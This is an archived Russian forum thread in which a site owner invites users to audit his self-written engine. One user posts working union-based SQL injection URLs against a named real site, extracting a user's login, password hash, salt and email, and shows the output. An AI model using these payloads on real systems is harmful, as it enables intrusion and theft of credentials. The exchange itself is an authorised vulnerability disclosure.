PDA

Просмотр полной версии : Аудит сайта.


kingbeef
26.08.2012, 09:05
Самописный движок

http://vrn1.ru
100% движка(кроме поддоменов) написаны с нуля, просьба проверить на возможнгые уязвимости

BigBear
27.08.2012, 11:54
Ну вот как то так...

Нефильтруемая переменная id

Inject

http://vrn1.ru/index.php?act=attach&type=post&id=-99+union+all+select+user()--

Response

vrn1_user@localhosto

Ну и понеслось...

http://vrn1.ru/index.php?act=attach&type=post&id=-99+union+all+select+(select+concat(0x27,0x7e,unhex (Hex(cast(users.id+as+char))),0x5e,unhex(Hex(cast( users.login+as+char))),0x5e,unhex(Hex(cast(users.p ass+as+char))),0x5e,unhex(Hex(cast(users.salt+as+c har))),0x5e,unhex(Hex(cast(users.email+as+char))), 0x27,0x7e)+from+%60vrn1_bd%60.users+where+id=12792 )+--

Response

http://vrn1.ru/img/'~12792^BigBear^cb50ba4d1184b689ceb1050e5afcedc9^? i2XF^BigBear2008@yandex.ru'~o

12792 - мой акк, чтобы никого не палить)

Mantius
27.08.2012, 13:22
BigBear большое спасибо, что докопали так глубоко!
Это модуль совместимости со старой версией форума(была на движке ипб), там есть редиректы для тем, сообщений, профилей, разделов, поиска и, собственно, аттачей. Уязвимость была только в аттачах(допущена по невнимательности) и вы всё равно смогли найти её - браво! Это при том, что старые урлы в движке не используются(index.php вообще физически не существует на сервере) и отдельного труда стоило найти их и обратить внимание на реализованную обратную совместимость.

Если честно, поначалу не воспринял всерьёз совет kingbeef создать тему именно на этом форуме, подумав, что здесь не будет нормальных спецов, а теперь вижу, что был не прав=)

Mantius
27.08.2012, 13:38
На vrn1.ru движок первый полностью с нуля написанный мной - его я писал и параллельно изучал необходимые языки/технологии(пхп и html немного знал, мускул, яваскрипт, jquery и css пришлось учить с нуля) в течении двух месяцев. Собственно, до сих пор он остаётся самым функциональным из всех мной написанных, потому и уязвимостей, на мой взгляд, в нём больше всего.

Mantius
01.10.2012, 14:08
Тестирование окончено, спасибо всем участникам! Отписываться большинство не стали, но по логам я вижу, что люди активно участвовали и искали дыры - благодарность им за это.